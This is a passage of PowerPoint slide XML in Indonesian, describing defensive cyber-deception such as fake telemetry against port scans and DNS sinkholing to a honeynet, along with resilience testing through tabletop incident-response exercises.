              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telemetri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendeteksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dilaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> salah </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperlambat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Telemetri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merujuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengukuran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> oleh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemindaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Telemetri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>palsu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serupa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melaporkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>padahal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebenarnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sinkhole DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merutekan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencurigakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> honeynet, di mana </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>trafik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dianalisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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164</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="418121624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Menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Ketahanan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengujian</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ketahanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efektivitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pulih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gangguan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menjaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelangsungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melakukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengujian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerentanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisiensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> strategi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemulihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesiapsiagaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keseluruhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghadapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>insiden</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di dunia </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nyata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Latihan di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendiskusikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengerjakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hipotetis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rencana</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan proses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengambilan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keputusan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Latihan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesenjangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengetahuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koordinasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhirnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperkuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanggap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>darurat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>latihan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mensimulasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ransomware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menguji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
